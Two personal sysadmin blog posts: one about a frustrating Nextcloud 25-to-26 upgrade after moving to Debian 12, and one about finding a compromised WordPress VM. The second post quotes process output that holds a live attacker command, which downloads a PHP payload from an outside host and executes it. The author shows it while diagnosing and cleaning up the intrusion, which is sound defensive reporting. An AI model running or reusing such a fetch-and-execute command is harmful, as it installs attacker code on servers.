Nextcloud upgrade woes

I have been self-hosting a Nextcloud instance for almost two years. It is a LAMP stack in a Proxmox LXC container. The container's operating system is Debian 11, with PHP 7.2.

Up until Nextcloud 25, everything is good. I always use the web updater for minor and major Nextcloud upgrades. It wasn't always smooth sails (sometimes I need to drop into the command line to do some post upgrade stuff), but generally speaking things work as intended.

A few months ago, I heard Nextcloud 26 would deprecated PHP 7.2, which means Debian 11 would not be able to upgrade to Nextcloud 26. That's fine, because Debian 12 was just around the horizon. I can rock 25 until Debian 12 comes out in the summer.

Fast forward to yesterday, I decided to upgrade my LXC container to Debian 12 and Nextcloud from 25 to 27, since both projects just released major upgrade within the last week. How exciting! Strangely enough, in the Nextcloud web interface, under "Administration settings", it doesn't even report new version 26 or 27.

I thought "Fine, I will upgrade Debian first and then use Nextcloud web updater". Turns out, Debian upgrade went very smoothly; all php packages were bumped from 7.2 to 8.2; reboot, done. However, Nextcloud cannot be opened, the web interface says something like "This version of Nextcloud is not compatible with PHP>=8.2. You are currently running 8.2.7". I start to grind my teeth as Nextcloud throws me into this hoop. "Fine, I will manually upgrade".

Following the How to upgrade guide, I downloaded latest.zip from Nextcloud website, and start the (painful) process:

  • turn maintenance mode on
  • unzip the file
  • copy everything except config and data into the document root located at var/www/nextcloud
  • make sure user, group and permissions are correct
  • added “apc.enable_cli = 1” to php cli config because of this bug
  • sudo -u www-data php occ upgrade

Of course it didn't work. I went to the web interface to see why, it says "Updates between multiple major versions are unsupported". You can hear me grinding my teeth from across the street.

Finally, after a lot of faffing, I downloaded Nextcloud 26.0.2 and successfully upgraded. However, that's not the end of misery. As per usually, major upgrade always needs some cleaning up. I got half a dozen warnings under "Administration settings", like php memory_limit, file hash mismatch, cron job failed, etc. They are not difficult to fix, just hella annoying.

Just thinking about 26-27 upgrade will put me through (some of) the rigmarole again, I'm already tired. This process is stressful and tedious, especially for something you only need to do every half a year. It periodically reminds me of the bad old days of system administration. Maybe I should've opted in the docker container deployment, I don't know.

On the flip side, thank goodness I have ZFS snapshots for the container and data directory. Should something goes wrong I can always roll back.

A Close Call: How a WordPress Site is Almost Hacked

Background

I have a few spare VMs running in the cloud, waiting to be purposed. These VMs are provisioned using Ansible but are not in production use. One of them hosts a WordPress site using basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that the sshd is configured to use key authentication only, as a sane person would do.

This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page came with WordPress, with little to no configuration other than WP 2FA and W3 Total Cache plug-ins.

How I found out

I occasionally go to the website url to check if everything is working. Strangely enough, one day, the website was unreachable. I tried to ssh into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I uninstalled all diagnostics agent software pre-installed by the cloud provider just to keep the tiny VM lean; I could not monitor the VM in the dashboard as a result.

After the VM came back from reboot, the website started to show up and I could ssh in. Everything seemed to be functional again. However, it didn't last long until the VM locked up again. That is, a few hours later when I checked in, same things happened all over again.

Investigation

After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website was too popular: it's just a blank site with almost zero traffic. The apache configuration is kept as default; php-fpm configuration are tuned to be on the conservative side with very few workers. I started a bench test from another VM using apache2-utils package:

~$ ab -c30 -t30 'https://example.com/?cat=1'

This commands spins 30 dynamic connections from the other VM to stress test the php processing. As expected, it handles the test just fine, without any significant RAM usage.

As I dug deeper into the process tree, it didn't take me long to find out that the memory was slowing being eaten by php processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service gives the following info:

● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
     Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
     Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
       Docs: man:php-fpm7.4(8)
    Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
   Main PID: 482 (php-fpm7.4)
     Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
      Tasks: 75 (limit: 1128)
     Memory: 773.4M
        CPU: 14min 29.690s
     CGroup: /system.slice/php7.4-fpm.service
             ├─   482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
             ├─   649 php-fpm: pool www
             ├─   750 php-fpm: pool www
             ├─   753 php-fpm: pool www
             ├─   768 php-fpm: pool www
             ├─ 56725 php-fpm: pool www
             ├─ 56736 php-fpm: pool www
             ├─ 56737 php-fpm: pool www
             ├─ 92508 php-fpm: pool www
             ├─ 92528 php-fpm: pool www
             ├─ 92529 php-fpm: pool www
             ├─ 92587 php-fpm: pool www
             ├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
             ├─ 98848 php inc.class.xleet.php
             ├─107565 sh -c php inc.class.xleet.ph

The last three processes immediately gave me a chill in the back. Why is it downloading and executing a php script? It is so bad.

A quick ls -lA on the document root:

total 344
-rw-r--r--  1 www-data www-data  8197 Mar  7 15:21 .htaccess
-rwxr-xr-x  1 www-data www-data  2067 Feb 21 20:19 3index.php
-rw-r--r--  1 www-data www-data   362 Feb 16 11:25 accesson.php
-rw-r--r--  1 www-data www-data 16090 Mar  7 16:18 angry.txt
drwxr-xr-x  3 www-data www-data  4096 Feb 22 09:36 assets
-rw-r--r--  1 www-data www-data  1194 Mar  7 16:18 inc.class.xleet.php
-rwxr-xr-x  1 www-data www-data   405 Feb 22 19:35 index.php
-rwxr-xr-x  1 www-data www-data 19915 Mar  7 15:32 license.txt
-rw-r--r--  1 www-data www-data 12484 Mar  7 16:18 list.txt
-rwxr-xr-x  1 www-data www-data  2012 Nov 10 09:31 old-index.php
-rw-r--r--  1 www-data www-data    29 Feb 21 20:19 on.php
-rwxr-xr-x  1 www-data www-data  7437 Mar  7 15:32 readme.html
-rwxr-xr-x  1 www-data www-data   556 Oct 29 23:53 robots.txt
-rw-r--r--  1 www-data www-data 10445 Mar  7 16:18 roll.txt
-rwxr-xr-x  1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r--  1 www-data www-data  1219 Feb 22 19:35 unzip.php
-rwxr-xr-x  1 www-data www-data  2094 Nov 10 10:21 wikindex.php
drwxr-xr-x  8 www-data www-data  4096 Oct 29 16:10 wordpress
-rwxr-xr-x  1 www-data www-data  7165 Jan 20  2021 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Dec 31  1969 wp-admin
-rwxr-xr-x  1 www-data www-data  7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x  1 www-data www-data   351 Feb  6  2020 wp-blog-header.php
-rwxr-xr-x  1 www-data www-data  2338 Feb  1 12:35 wp-comments-post.php
-rwxr-xr-x  1 www-data www-data  3001 Feb  1 12:35 wp-config-sample.php
-rwxr-xr-x  1 www-data www-data  3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data  4096 Mar  7 15:33 wp-content
-rwxr-xr-x  1 www-data www-data  3939 Jul 30  2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb  1 12:35 wp-includes
-rwxr-xr-x  1 www-data www-data  2496 Feb  6  2020 wp-links-opml.php
-rwxr-xr-x  1 www-data www-data  3900 May 15  2021 wp-load.php
-rwxr-xr-x  1 www-data www-data 47916 Feb  1 12:35 wp-login.php
-rwxr-xr-x  1 www-data www-data  8582 Feb  1 12:35 wp-mail.php
-rwxr-xr-x  1 www-data www-data 23025 Feb  1 12:35 wp-settings.php
-rwxr-xr-x  1 www-data www-data 31959 Feb  1 12:35 wp-signup.php
-rwxr-xr-x  1 www-data www-data  4747 Oct  8  2020 wp-trackback.php
-rwxr-xr-x  1 www-data www-data  3236 Jun  8  2020 xmlrpc.php

Clearly there are some unknown files being created (like angry.txt) and the BIG RED ALERT inc.class.xleet.php. I tried to delete those files and they kept popping up. I also noticed the weird permission in the document root, 755 seems to be too open. However, no time to think! I quickly removed the document root entirely and went on to check system logs to see if there is any bigger problem. Luckily I didn't find any evidence that the VM is compromised.

Back to WordPress, I downloaded a new installer and the default permission is conservative (644 for the most part). Extracted and started serving, the php scripts didn't make a come back.

Postmortem

I am not an expert in security but this is serious enough for me to reflect and make a lesson. The most likely scenario is that file permission for document root is too open. Either the www:data user or php-fpm process is compromised as a result.

It was ultimately due to a mis-configuration in my Ansible playbook, in which it extracts the WordPress tar ball and reset the permission to 755. Thank goodness this is the only affected machine, as other WordPress sites that I administer are setup by hand.

Lastly, I removed this VM entirely as a precaution.

Takeaways

There are three lessons I learned:

  1. When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
  2. Don't mess with default permission for no obvious reasons
  3. Examine the automation code carefully before pushing; convenience can sometimes be a double edge sword